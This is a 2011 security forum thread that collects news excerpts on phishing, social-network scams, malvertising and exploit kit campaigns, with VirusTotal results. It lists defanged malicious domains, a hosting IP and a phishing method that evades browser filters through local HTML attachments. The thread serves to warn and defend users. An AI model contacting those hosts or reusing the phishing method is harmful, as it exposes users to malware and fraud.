2072 replies to this topic

[AplusWebMaster]

FYI...

Disaster brings fakes, scams, malware pushed by hacks ...
- http://isc.sans.edu/...l?storyid=10537
Last Updated: 2011-03-11 13:29:49 UTC - "There will probably be some emails scams and malware circulating regarding the recent Japanese earthquake that occurred overnight...
Be aware of:
Fraudulent Organizations: If possible, donate to organizations you know and trust, not to new organizations just set up for this particular event. The IRS maintains a list of tax exempt charitable organizations*. This list is not 100% up to date, and it takes a while for a new organization to be added. But it can serve as a first sanity check.
Malware: Malware may be advertised as a video report of the event or come under other pretenses..."

* IRS online charities search can be found here: http://www.irs.gov/app/pub-78/

> http://blog.trendmic...-lead-to-fakea/

> http://www.f-secure....s/00002119.html

> http://www.us-cert.g...sunami_disaster

Edited by AplusWebMaster, 12 March 2011 - 06:25 AM.

[AplusWebMaster]

FYI...

FTC advisory - charity SCAMS
- http://www.ftc.gov/o...earthquake.shtm
03/14/2011 - "After the earthquake that rocked Japan’s northeast coast and triggered a widespread tsunami last week, the Federal Trade Commission is urging consumers to be cautious of potential charity scams... carefully consider urgent appeals for aid that (are received) in person, by phone or mail, by e-mail, on websites, or on social networking sites. The agency’s Charity Checklist* advises consumers about donating wisely to charities..."
* http://www.ftc.gov/b...rts/alt114.shtm
___

- http://community.web...e-disaster.aspx
15 Mar 2011

Edited by AplusWebMaster, 18 March 2011 - 09:57 PM.

[AplusWebMaster]

FYI...

Phish targets BoA, PayPal...
- http://www.theregist...firefox_chrome/
17th March 2011 - "... phishing attacks targeting customers of Bank of America and PayPal circumvent fraud protections built in to the Mozilla Firefox and Google Chrome browsers by attaching an HTML file to the spam email. According to M86 researcher Rodel Mendrez*, the locally stored file opens a web form that collects the customers' login credentials, credit card numbers and other sensitive information and then uses a POST request to zap them to a PHP application on a legitimate website that's been compromised. By avoiding the use of more verbose GET requests and known phishing sites, the scam flies completely under the radar of the browsers' fraud protection features..."
* http://labs.m86secur...tml-attachment/
March 15th, 2011 - "... Phishers... have found ways to circumvent this anti-phishing protection by attaching an HTML file to the spam email. This system avoids the HTTP GET request to the phishing site, thus avoiding being blocked by the browser..."

[AplusWebMaster]

FYI...

Twitter SCAMS spreading fast
- http://nakedsecurity...spreading-fast/
March 17, 2011 - "... Thousands of Twitter users are falling once again for a scam that requires victims to grant access to a malicious application. Today's scam seems to be a continuance of a trend in which the scammers are adapting their ego-driven bogus Facebook apps to operate on Twitter... If you accept the application, not only will it post to your Twitter feed, it will also display an image with a random number that supposedly represents the number of people who have viewed your profile. Not surprisingly, the revenue generating opportunity for these scammers is a fake IQ test that suggests you could win a free iPad*... The advice remains the same as for Facebook. Be cautious of which games/apps you approve and carefully audit the authorization page to see if an app wants control of your account or permission to post..."
* http://sophosnews.fi...1...w=500&h=244

[AplusWebMaster]

FYI...

SPAM/phish continues...
- http://www.us-cert.g...phishing_attack
March 18, 2011 - "... public reports of an ongoing phishing attack. At this time, this attack appears to be targeting PayPal, Bank of America, Lloyds, and TSB users. The attack arrives via an unsolicited email message containing an HTML attachment. This attack is unlike common phishing attacks because it locally stores the malicious webpage rather than directing user to a phishing site via a URL. Many browsers utilize anti-phishing filters to help protect users against phishing attacks, this method of attack is able to bypass this security mechanism..."
___

- http://tools.cisco.c...r...&sortType=d
March 18, 2011

Edited by AplusWebMaster, 18 March 2011 - 12:46 PM.

[AplusWebMaster]

FYI...

Fake Facebook email - Zbot and Black Hole Exploit Kit "all in one"
- http://community.web...ments-spam.aspx
18 Mar 2011 - "Websense... has detected a new malicious email campaign that masquerades as originating from Facebook. The campaign appears to actually be originating from the Cutwail/Pushdo spam bot. This time round, the Cyber criminals employ two attack vectors: social engineering and an exploit kit. Both end up with the Zeus/Zbot Trojan installed on the targeted machines... The malicious email is spoofed to appear to be coming from Facebook.com and says: "Hi, someone loves your photo comments, please click on the link to see all comments". It provides a fake URL disguised as a formal Facebook link. Once clicked, the user is redirected to an attack page and is prompted to download and run an "update" from Facebook. The "update" file is a Zeus/Zbot Trojan variant. At the time of writing, the file had only a 7% detection*... The attack isn't over yet. While the fake Facebook page loads, the user's machine is attacked silently with several exploits in the background. The exploits are sent via an iframe contained in the fake Facebook attack page. This process happens silently when the attack page is loaded. The exploits are loaded from one of the most prevalent exploit kits today - the Blackhole exploit kit. -Any- successful exploitation results in the Zeus/Zbot Trojan installed silently on the user's machine..."
* http://www.virustota...c0f1-1300384459
File name: facebook.update.utility.exe.1
Submission date: 2011-03-17 17:54:19 (UTC)
Current status: finished
Result: 3/43 (7.0%)
There is a more up-to-date report...
- http://www.virustota...c0f1-1300478516
File name: 8bba2928b7060906a3d433a96856acbb
Submission date: 2011-03-18 20:01:56 (UTC)
Result: 14/41 (34.1%)
There is a more up-to-date report...
- http://www.virustota...c0f1-1300555240
File name: 8bba2928b7060906a3d433a96856acbb
Submission date: 2011-03-19 17:20:40 (UTC)
Result: 18/41 (43.9%)

Edited by AplusWebMaster, 19 March 2011 - 12:25 PM.

[AplusWebMaster]

FYI...

Tax Season - phishing scams, malware campaigns
- http://www.us-cert.g...phishing_scams1
March 16, 2011 - "... These phishing scams and malware campaigns may include, but are not limited to, the following:
* information that refers to a tax refund
* warnings about unreported or under-reported income
* offers to assist in filing for a refund
* details about fake e-file websites
These messages which may appear to be from the IRS, may ask users to submit personal information via email or may instruct the user to follow a link to a website that requests personal information or contains malicious code...
• Do not follow unsolicited web links in email messages.
• Maintain up-to-date antivirus software..."
- http://www.irs.gov/p....html?portlet=5

(More info and detail at both URL's above.)

[AplusWebMaster]

FYI...

Spotify users attacked by drive-by malware...
- http://news.netcraft...by-malware.html
25 March, 2011 - "Users of the Spotify Free music streaming software have been attacked by drive-by malware. At least one attack used a Java exploit to drop malicious executable code on a victim's computer, with AVG software identifying one of the malicious payloads as Trojan horse Generic_r.FZ. Another threat blocked by AVG was a Blackhole Exploit Kit hosted on the uev1 .co .cc domain. Several people have reported the problem to Spotify over the past 24 hours, and attacks are still being reported at the time of publication. It is believed that the attacks are being launched through malicious third-party adverts which are displayed in ad-supported versions of the Spotify software. By exploiting local software vulnerabilities, the attacker can then install malware on unprotected computers."

- http://community.web...icious-ads.aspx
25 Mar 2011 - "... The first report we have of a malicious ad being displayed is from around 11:30 GMT on March 24... In this case the malicious ad is actually displayed inside of the Spotify application... The application will render the ad code and run it as if it were run inside a browser. This means that the Blackhole Exploit Kit works perfectly fine and it's enough that the ad is just displayed to you in Spotify to get infected, you don't even have to click on the ad itself. So if you had Spotify open but running in the background, listening to your favorite tunes, you could still get infected. Seems like free does come at a price after all. Spotify removed all 3rd party ads in the free version while they did their investigation but the ads have now been turned back on again. Once the ad was displayed, the computer would connect to hxxp: //uev1 .co .cc where the exploit kit tries several vulnerabilities to infect the user. The IP address where the malicious content is hosted is well-known to us and we have seen it host the same exploit kit on several other domains... One of the vulnerabilities the exploit kit uses is a vulnerability in Adobe Reader/Acrobat. The kit uses a heavily obfuscated PDF file to make the infected computer download the fake AV software. Here are the VirusTotal reports for the PDF and the fake AV file*. Once the fake AV is launched it connects to the following domains to download additional content, including a rootkit** which is a packed version of TDSS:
• tuartma .in, rappour .in, findstiff .org, searchcruel .org, findclear .org, replity .in, searchgrubby .org, demivee .in, ripplig .in..."
(Screenshots and more detail available at the URL above.)
* http://www.virustota...7acf-1301413767
File name: L9FPB1.pdf
Submission date: 2011-03-29 15:49:27 (UTC)
Result: 12/43 (27.9%)

** http://www.virustota...f261-1301086553
File name: spotify_dropped.exe
Submission date: 2011-03-25 20:55:53 (UTC)
Result: 4/43 (9.3%)
There is a more up-to-date report...
- http://www.virustota...f261-1301408014
File name: f5dcd2415fa4b069c0b934baee109ea5
Submission date: 2011-03-29 14:13:34 (UTC)
Result: 21/41 (51.2%)

Edited by AplusWebMaster, 02 April 2011 - 05:28 AM.

[AplusWebMaster]

FYI...

IRS Scam - by Fax
- http://krebsonsecuri...hishing-by-fax/
March 29, 2011 - "Scammers typically kick into high gear during tax season in the United States, which tends to bring with it a spike in phishing attacks that spoof the Internal Revenue Service. Take, for example, a new scam making the rounds via email, which warns of discrepancies on the recipient’s income tax return and requests that personal information be sent via fax to a toll-free number. A new phishing campaign that began sometime in the last 24 hours is made to look like it was sent from irs@irsonline.gov, and urges recipients to fill out, print, and fax an attached PDF tax form... That 866- phone number is currently returning a fast-busy signal, which suggests either that a lot of people are falling for this scam, or that anti-scammers are speed-dialing the number in a bid to prevent would-be victims from faxing in their forms... It’s worth noting that the data requested in this bogus IRS form includes the Social Security number, e-File PIN and adjusted gross income, all of which are crucial pieces of information that the IRS uses to authenticate taxpayers. The IRS has been careful to note that while it may conduct follow-up correspondence with taxpayers via email if the taxpayer chooses to communicate that way, it will -never- reach out to taxpayers via email..."

[AplusWebMaster]

FYI...

Epsilon breach...
- http://www.databreaches.net/?p=17374
April 3, 2011 - "... See Brian Krebs’ commentary* on the fears about spear phishing as a result of this breach..."
* http://krebsonsecuri...spear-phishing/
April 4th, 2011 - "... be especially alert for targeted email scams in the coming weeks and months, following a breach at a major email marketing firm that exposed names and email addresses for customers of some of the nation’s largest banks and corporate brand names. Late last week, Irving, Texas based Epsilon issued a brief statement warning that hackers had stolen customer email addresses and names belonging to a “subset of its clients.” Epsilon didn’t name the clients that had customer data lost in the breach... Among Epsilon’s clients are three of the top ten U.S. banks – JP Morgan Chase, Citibank and U.S. Bank — as well as Barclays Bank and Capital One. More than two dozen other brands have alerted customers to data lost in the Epsilon breach..."
___

- http://isc.sans.edu/...l?storyid=10651
Last Updated: 2011-04-04 20:24:45 UTC
- http://www.darkreadi...le/id/229400828
Apr 04, 2011
___

- http://community.web...of-epsilon.aspx
April 14, 2011 - "... attack page tries to get visitors to download the malicious binary by convincing them that there was an update to the press release dated April 8th. The "update" states that Epsilon's investigation into the data leak has revealed that personally identifiable information was lost in the attack. The fake update goes on to state that people can check to see if their personal information was lost by downloading and installing an "Epsilon Secure Connect Tool."* The downloaded file is called EpsilonSecureConnect.exe..."
* http://www.virustota...125d-1302850824
File name: [11757]EpsilonSecureConnect.exe.#
Submission date: 2011-04-15 07:00:24 (UTC)
Result: 20/41 (48.8%)

Edited by AplusWebMaster, 15 April 2011 - 05:49 AM.

[AplusWebMaster]

FYI...

Twitter worm "Profile Spy"...
- http://www.theregist...5/twitter_worm/
5 April 2011 - "... a virally spreading worm that attempts to make money by scamming users into filling out surveys and viewing advertisements.
The rogue Twitter app is known as Profile Spy and gets installed by people who are tricked into believing it can tell them who has been viewing their online microposts. “Wow! See who viewed your twitter with Profile Spy,” the come-on reads. Those who click on the link are asked to allow the app to access and update their account data. Once they do so, they are presented with an unending series of popups for online surveys and ads promoting car insurance, long distance services and games, according to Errata Security CEO Rob Graham*, who blogged about the worm on Monday..."
* http://erratasec.blo...rofile-spy.html
April 04, 2011

[AplusWebMaster]

FYI...

SpyEye banking trojan - same as ZeuS...
- http://www.theregist..._mobile_trojan/
5 April 2011 - "Cybercrooks have deployed a sophisticated man-in-the-mobile attack using the SpyEye banking Trojan toolkit. The Trojan, which infects Windows machines, displays additional content on a targeted European bank's webpage that requests prospective marks to input their mobile phone number and the IMEI of the device. The bank customer is informed the information is needed so that a new "digital certificate" can be sent to the phone... More information on the SpyEye-based mobile banking Trojan attack can be found in a blog post by F-Secure here*."
* http://www.f-secure....s/00002135.html
April 4, 2011

[AplusWebMaster]

FYI...

Symantec Internet Security Threat Report...
- http://www.symantec....rid=20110404_03
April 5, 2011 – "Symantec... today announced the findings of its Internet Security Threat Report, Volume 16, which shows a massive threat volume of more than 286 million new threats last year, accompanied by several new megatrends in the threat landscape...
> 2010: The Year of the Targeted Attack...
> Social Networks: Fertile Ground for Cybercriminals...
> Attack Toolkits Focus on Java...
> Mobile Threat Landscape Comes Into View...
> Key Facts and Figures:
• 286 million new threats...
• 93 percent increase in Web-based attacks...
• 260,000 identities exposed per breach...
• 14 new zero-day vulnerabilities...
• 6,253 new vulnerabilities...
• 42 percent more mobile vulnerabilities...
• One botnet with more than a million spambots - Rustock..."
(More detail available at the URL above.)

[AplusWebMaster]

FYI...

Facebook "video" SCAMS...
- http://community.web...n-facebook.aspx
9 Apr 2011 - "... scam making its way across Facebook linking to a video titled "The Hottest & Funniest Golf Course Video - LOL"... When clicking on the link you're taken to the following page, tricking you into not only liking the page but also sharing it with your friends. It's doing this by using standard Facebook APIs... After liking and sharing the page, and attempting to view the video, the user is taken to a typical CPA Survey scam so in the end there's no video at all... As always, if a video forces you to like, share, or install an app to view it, DON'T..."

[AplusWebMaster]

FYI...

WordPress sites hacked - link injection – Blackhat SEO SPAM
[1] - http://blog.sucuri.n...t-seo-spam.html
April 11, 2011 - "For the last few months we’ve been tracking and helping webmasters affected by a very large blackhat SEO spam campaign initiated by basicpills .com and many other domains[1] located at 212.117.161.190. They infected thousands of WordPress sites and injected spam links directly in their databases (the wp-post table)... For the site owners out there, you can check if your site has been infected by scanning it with our malware and spam scanner*. It will show if these links have been added, and if you have other security issues. If your site has been hacked, we recommend changing your DB passwords immediately and checking the permissions of your wp-config.php file..."
* http://sitecheck.sucuri.net/

> http://centralops.ne...ainDossier.aspx
** canonical name: basicpills .com.
addresses: 212.117.161.190...
http://google.com/sa...basicpills.com/
... This site was hosted on 1 network(s) including AS5577 (ROOT).

** 212.117.161.190
country: LU
origin: AS5577
> http://www.google.co...ic?site=AS:5577
"Of the 1939 site(s) we tested on this network over the past 90 days, 98 site(s)... served content that resulted in malicious software being downloaded and installed without user consent... Over the past 90 days, we found 64 site(s) on this network... that appeared to function as intermediaries for the infection of 139 other site(s)... this network has hosted sites that have distributed malicious software in the past 90 days. We found 316 site(s)... that infected 4190 other site(s)..."
___

- http://en.blog.wordp...04/13/security/
April 13th, 2011

Edited by AplusWebMaster, 17 April 2011 - 04:24 AM.